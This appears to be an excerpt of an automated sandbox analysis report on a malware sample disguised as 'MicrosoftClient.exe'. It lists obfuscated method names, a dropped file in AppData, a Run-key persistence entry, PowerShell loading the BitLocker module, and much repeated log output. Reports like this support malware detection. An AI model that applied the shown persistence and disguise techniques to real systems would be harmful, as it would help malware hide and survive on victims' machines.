                          Source: MicrosoftClient.exe.0.dr, LYQIWx0vxxudRlTzfQ0waGDKlqkAgcH7WUyA3eq2.csHigh entropy of concatenated method names: 'aN8VYkhc0BO34AMF7GwwtAcuEMi8gpLKT0sBVyiJ', 'KF4fWkhGpT0A9Qn818SJnpIJCk1h3stAQcgmNpxB', 'jurUB02cOltjuscD09WWl8F1Os4OJSMGfVHBLrPf', 'u84FUlA8UhiU1Ck0UM3rIdd33UupfVmcENg241d6', 'zBH2q54hjV8xSrFrXE0yEeezAvcde6pR0qEcNUvC', 'Bwlz4YPX68j6SXY3g8EzLyZdsBilO2ilgtMsNFpqHfzWZPH0a1', 'LIScEfY7zZ9tVLYhkj7NZv4T8GgZrwbYaZlOKmPS5UN5HtzRGw', 'zhEDKhI5fm3XXvX7PbMRWPVvQKbIr6tWMUXWD4O9XGBlJ5tM1k', 'YGjf4QSiliOhMxkLAfF03TDhmB4aoUPGEtgyXyGQcXsIlLdYy8', 'JXYPkt8Jc9cHWwIZQVgseSeK4KCbc9BiY7TP3WfRiFuFzwM61c'
                          Source: MicrosoftClient.exe.0.dr, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.csHigh entropy of concatenated method names: 'MIC0gXm6oQLdJJNexLAZ0VfQp7AyfIaMpbOVt0M1QQZEcmxA7Sf5L9YIUN', 'xoMoqlJJoBCpUws1UFZyAVxdCo4nimVTZ1HAmCp9FfNxYDh18rUDURGbfR', 'uGU04LhSc0DLfZmkwJ41N4uQxupxiuVB5cnzQc7zH1M4R7qywoQDKi0Uc2', 'D2lsPY8vIDAUmaZv38f94w3l14oWYBUSPfO4AlTvZi42FhqpK9xjwmtVdw', 'xLaib1dRWTsno2J1oeKLMQoDEOi7lPfX9wC4ifXlivIfTlYdbKKz1lGYnh', 'maoX0CbSzaK3Rp28VcoiQMu0Yd8lXEdqZ1n97iyuyV8mnHEWcdUtMo32aR', 'Ntyhb7069wrMlb0XmKNw1PHMTQNHhD7FeCZpkZTap14DxxYTvmwaFExi5G', 'ttrAVNH6YBCZfgmZxa3WCFElLj8U1ZNOWuqbF9YWTWc0wemzUYZCmtiKvT', 'oIjsldVLmBsoVjw0x6MU9ifVuMIypjsEe6oxIf0rF11lzjDqVoi4fiHyTd', '_55PjX53gU1NTJU3tah4lib8YBCex6SJjDcIdwVC9HxM9H8ap37s1hNQ2T5'
                          Source: MicrosoftClient.exe.0.dr, YIsiQT0bVRZkgJBchQD3mj8TT.csHigh entropy of concatenated method names: '_9EKA4mmYhS5A3Vo7PQ5U8yYpV', '_3F8KZvwIIllQlPE51Q7rT7NP6', '_2MK6IwXfT4BOrv9J3aXyidWkj', '_5T1TMhB3O7StVjktbLYkSdIZp', 'iuuUZwHDvSsobqzAj4G742AIvHkq8JAEWiL', 'DlrOYOIGTZV4eJpPtea5byCrFn4zM8nublj', '_9ILnQINVxIYDQ97TVIaa9YyCpB7EXAW5tom5Es3ncPJ1lS95RaMBwRsWQNgKYutlvNo', 'VXmJfTdoGixB1E5Z1wjgTOteiJOmc6KBc4xrCsqFVbJwXC1iznjrsa7UHQE2XigNpuH', '_5wNIasIaQNeaZwCIvHyKNM1SOqS7HX3huPu0AQBwPzVGiYotwHWJSytkXkzbO10a0u5', 'NqPA5cp23835Re9M2uVQVtMMUJvNAjSqvVFtg3TUx4mDFNPZ8gLyuQYAAKvkocPUew0'
                          Source: MicrosoftClient.exe.0.dr, xEidHkjl3ZbqUKvIPhMdYvEBT.csHigh entropy of concatenated method names: 'BDRQ8CiLuswqAppJ4K91S5dh7YdvybCtM3VXEJxg8i33Ed3RgMAv6gmJro', '_2nTtKAoberzYJFa7yq1LShwR8iNGoNekJgkkYX6S1BcPCM8qgTL5QO4WVKcyQKvXUXx', 'CV9weyjNtLvDncWBpl6tyfl7rElfyAYbtml1wChTE2sQe7JYYGIUlJ6anqhPEQaqgxm', 'GmaE3jPyBngvX63rusAkRdVRn1ie9jYpnFfeg98CF9ox4G8MiFGJjJdguFMfwhYFN1T', '_5LiqLS0rriTlip5EnigTqlfbYT3O9Zqp992Vw5piCNSkIp7WEyJpSl0bNpEFgIiES8U'
                          Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.csHigh entropy of concatenated method names: 'LRbYTeQD7H3jkFsPe9vpLFlDK', 'hi8i65wpblvGWk5oXoxjBQ3BH', 'l54elty1mfujUEGBMp1X01hln', 'wMGCYdFEkNKYe9j3GZMkOGgBb', '_7ufBfU62R4YZocKbpyUGXuknW', 'vXnHhVT57mZluAzRt80l5DsC6', 'Xyybo5TncnAaF1HAYGa0X7pSt', 'FjPS8U7KdFCmJBM975RiRSOwG', 'q0i2kZtvL6SyvbPYW8hbQYPfk', 'PDkuHMfS9HsSe85HDqEfRBcdl'
                          Source: MicrosoftClient.exe.0.dr, a5vqhNcXHqNHEz8q3VSMya6o4.csHigh entropy of concatenated method names: 'tcLVTujiwrEFL1XBqaq0Gkulh', '_6YDoJioH7lq3A9fcfwP6t5FusMNbaJDowzB', 'zY6zaLyg7utnR5pYiU0cNBx8deQoNVFn4FM', 'Rpmrt7znvurUSjgCFVpoXZqCBkQRHATCDfT', 'B6vwsK21WX1UISAfEue3xQtBL56Pan3z3w4'
                          Source: MicrosoftClient.exe.0.dr, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.csHigh entropy of concatenated method names: '_3LFonnJfMRrLHdpajh1txoztqe85dV2AVPAe2ScC', 'A4Ca0fThPYuMM71E9HMZWq5tGxpad03yOTvETA0o', 'pcaW3zWDHX7MVjNus91u9hKz7', 'Jp9k7fXgQoYDxMbOc7uHDDsth', 'nWxxEIQKgRUY1dWWi3OQPdZ89', 'STGNxbu4HbCk1zVHeAiYEueIa', 'Qmu9tHeWTcvzanYgBmEpbSdxN', 'FpuhZCDsHlAP5KMW0BQMk5HSp', 'uCtfHWlMzsUBm2H6W1BOk8o0J', 'cMoLfn0A28VUYcraKWobh80Nc'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, i1P5h3Yf5OnQi96hdLePtGoWhHPkDOJ9r7kQ4YJe6VnvuDEoTVZTFpXOCE.csHigh entropy of concatenated method names: 'ahkLBtcIAydoos0eu62oegKUfAo0SL3L9OD9j2T3JLmGzukbiyeKgLjCSPKg4EYgBnIBxgYtCh0xAeXwNQlEbGdFkA', 'AGw2v2oTlbKKwP5x54MXxcVDYqGPGQpRJipwdHpXHBPAMHi11we4uShSDNBrFuQYexAzu229tcRWrDyimxgzbdEdn7', 'e8sRBQTSKmYnc600qDRn7HAtf9sdYePcpIyv99Zf7KCV6zwVt7RnAo8eGU2j4VbptR4g0yX4svG23wpswKCHRHf2El', 'G2vZaPROQB58OHc93Il4EOQ6qitlnHPGbfidlAllzOQqJ2sZ5skIm', 'WVUPcFQrakwet0BYu6RZOeDnQflzSLDp128QAwVFA2AyCfVhtUp5Y', 'Lk39O2yY6bC2uVjbl0usdQMVKri6n206tM5wIieecU7Hyvy43bY15', 'z1HABQCPwrT0YomXKTfqflk7r7iysVNf40rvYabHoqgiu8hMl5Uf7', 'UUzA3oHXZI6sx4VEhyLrPn3QHw84Px1L7j3ZqKyf05vdV3dBh1tsj', '_2PEvelOuIaYGA3OZocilsXC0IPXEKv3yr4BL6LRL6tZ5PfEKN4cTV', 'JgxDH0Jzmif2muKohDfTiZUT1Ls0cCaHTxkK9yDyY7Vc7wiCfZ7cR'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.csHigh entropy of concatenated method names: 'jhqnO08Zvk17ev11zCn1tDNyTKV4wrZCE3H2RZPlHLutZ98jo9', 'V9mLFi4rb3GvXaL6EBDv0B8HJqs2WFhtPa3AH0lHf3A2pMXVYJ', 'GgcZLQqItYEUYNnNAZ4QKz0diL9fvAuCxQNymlrnZH4nl6sfyR', '_5nEc0S8xY9P4Ra53Ss7UIayp6ClaHO5HD3EtyBzzym99uzNybf'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CwgUWtA4EqaTAVKSuJbX5wXDfQHTFQ9u4KFXlf86FrRhdWOZZe4aaCgE6NOsP5wgybmILD80wDyjoLU0jDcqZlnSHBFP4AoybT.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'l7QqVOpv5orfSsK1rVePRY0QScELJRgtOU5S5qrR06ts0FGeXA', 'IMuVwxQ7PzQdOPdwzfvWABKRWs1TXTTNssoFw13dzaRdqhx3JW', 'k2S4f9gpgfpnL665tp9amMtsA5IoP9uFBFbPCgEiwTaSyeTujL', 'kH08bywJ8b6ETVolDtOEmOuJegDH2sdJ14AtxT8fI4GzS2JAOc'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, LYQIWx0vxxudRlTzfQ0waGDKlqkAgcH7WUyA3eq2.csHigh entropy of concatenated method names: 'aN8VYkhc0BO34AMF7GwwtAcuEMi8gpLKT0sBVyiJ', 'KF4fWkhGpT0A9Qn818SJnpIJCk1h3stAQcgmNpxB', 'jurUB02cOltjuscD09WWl8F1Os4OJSMGfVHBLrPf', 'u84FUlA8UhiU1Ck0UM3rIdd33UupfVmcENg241d6', 'zBH2q54hjV8xSrFrXE0yEeezAvcde6pR0qEcNUvC', 'Bwlz4YPX68j6SXY3g8EzLyZdsBilO2ilgtMsNFpqHfzWZPH0a1', 'LIScEfY7zZ9tVLYhkj7NZv4T8GgZrwbYaZlOKmPS5UN5HtzRGw', 'zhEDKhI5fm3XXvX7PbMRWPVvQKbIr6tWMUXWD4O9XGBlJ5tM1k', 'YGjf4QSiliOhMxkLAfF03TDhmB4aoUPGEtgyXyGQcXsIlLdYy8', 'JXYPkt8Jc9cHWwIZQVgseSeK4KCbc9BiY7TP3WfRiFuFzwM61c'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.csHigh entropy of concatenated method names: 'MIC0gXm6oQLdJJNexLAZ0VfQp7AyfIaMpbOVt0M1QQZEcmxA7Sf5L9YIUN', 'xoMoqlJJoBCpUws1UFZyAVxdCo4nimVTZ1HAmCp9FfNxYDh18rUDURGbfR', 'uGU04LhSc0DLfZmkwJ41N4uQxupxiuVB5cnzQc7zH1M4R7qywoQDKi0Uc2', 'D2lsPY8vIDAUmaZv38f94w3l14oWYBUSPfO4AlTvZi42FhqpK9xjwmtVdw', 'xLaib1dRWTsno2J1oeKLMQoDEOi7lPfX9wC4ifXlivIfTlYdbKKz1lGYnh', 'maoX0CbSzaK3Rp28VcoiQMu0Yd8lXEdqZ1n97iyuyV8mnHEWcdUtMo32aR', 'Ntyhb7069wrMlb0XmKNw1PHMTQNHhD7FeCZpkZTap14DxxYTvmwaFExi5G', 'ttrAVNH6YBCZfgmZxa3WCFElLj8U1ZNOWuqbF9YWTWc0wemzUYZCmtiKvT', 'oIjsldVLmBsoVjw0x6MU9ifVuMIypjsEe6oxIf0rF11lzjDqVoi4fiHyTd', '_55PjX53gU1NTJU3tah4lib8YBCex6SJjDcIdwVC9HxM9H8ap37s1hNQ2T5'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, YIsiQT0bVRZkgJBchQD3mj8TT.csHigh entropy of concatenated method names: '_9EKA4mmYhS5A3Vo7PQ5U8yYpV', '_3F8KZvwIIllQlPE51Q7rT7NP6', '_2MK6IwXfT4BOrv9J3aXyidWkj', '_5T1TMhB3O7StVjktbLYkSdIZp', 'iuuUZwHDvSsobqzAj4G742AIvHkq8JAEWiL', 'DlrOYOIGTZV4eJpPtea5byCrFn4zM8nublj', '_9ILnQINVxIYDQ97TVIaa9YyCpB7EXAW5tom5Es3ncPJ1lS95RaMBwRsWQNgKYutlvNo', 'VXmJfTdoGixB1E5Z1wjgTOteiJOmc6KBc4xrCsqFVbJwXC1iznjrsa7UHQE2XigNpuH', '_5wNIasIaQNeaZwCIvHyKNM1SOqS7HX3huPu0AQBwPzVGiYotwHWJSytkXkzbO10a0u5', 'NqPA5cp23835Re9M2uVQVtMMUJvNAjSqvVFtg3TUx4mDFNPZ8gLyuQYAAKvkocPUew0'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, xEidHkjl3ZbqUKvIPhMdYvEBT.csHigh entropy of concatenated method names: 'BDRQ8CiLuswqAppJ4K91S5dh7YdvybCtM3VXEJxg8i33Ed3RgMAv6gmJro', '_2nTtKAoberzYJFa7yq1LShwR8iNGoNekJgkkYX6S1BcPCM8qgTL5QO4WVKcyQKvXUXx', 'CV9weyjNtLvDncWBpl6tyfl7rElfyAYbtml1wChTE2sQe7JYYGIUlJ6anqhPEQaqgxm', 'GmaE3jPyBngvX63rusAkRdVRn1ie9jYpnFfeg98CF9ox4G8MiFGJjJdguFMfwhYFN1T', '_5LiqLS0rriTlip5EnigTqlfbYT3O9Zqp992Vw5piCNSkIp7WEyJpSl0bNpEFgIiES8U'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.csHigh entropy of concatenated method names: 'LRbYTeQD7H3jkFsPe9vpLFlDK', 'hi8i65wpblvGWk5oXoxjBQ3BH', 'l54elty1mfujUEGBMp1X01hln', 'wMGCYdFEkNKYe9j3GZMkOGgBb', '_7ufBfU62R4YZocKbpyUGXuknW', 'vXnHhVT57mZluAzRt80l5DsC6', 'Xyybo5TncnAaF1HAYGa0X7pSt', 'FjPS8U7KdFCmJBM975RiRSOwG', 'q0i2kZtvL6SyvbPYW8hbQYPfk', 'PDkuHMfS9HsSe85HDqEfRBcdl'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, a5vqhNcXHqNHEz8q3VSMya6o4.csHigh entropy of concatenated method names: 'tcLVTujiwrEFL1XBqaq0Gkulh', '_6YDoJioH7lq3A9fcfwP6t5FusMNbaJDowzB', 'zY6zaLyg7utnR5pYiU0cNBx8deQoNVFn4FM', 'Rpmrt7znvurUSjgCFVpoXZqCBkQRHATCDfT', 'B6vwsK21WX1UISAfEue3xQtBL56Pan3z3w4'
                          Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.csHigh entropy of concatenated method names: '_3LFonnJfMRrLHdpajh1txoztqe85dV2AVPAe2ScC', 'A4Ca0fThPYuMM71E9HMZWq5tGxpad03yOTvETA0o', 'pcaW3zWDHX7MVjNus91u9hKz7', 'Jp9k7fXgQoYDxMbOc7uHDDsth', 'nWxxEIQKgRUY1dWWi3OQPdZ89', 'STGNxbu4HbCk1zVHeAiYEueIa', 'Qmu9tHeWTcvzanYgBmEpbSdxN', 'FpuhZCDsHlAP5KMW0BQMk5HSp', 'uCtfHWlMzsUBm2H6W1BOk8o0J', 'cMoLfn0A28VUYcraKWobh80Nc'
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeFile created: C:\Users\user\AppData\Local\MicrosoftClient.exeJump to dropped file
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftClientJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftClientJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Loading BitLocker PowerShell Module
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\9RgE5uOJwX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
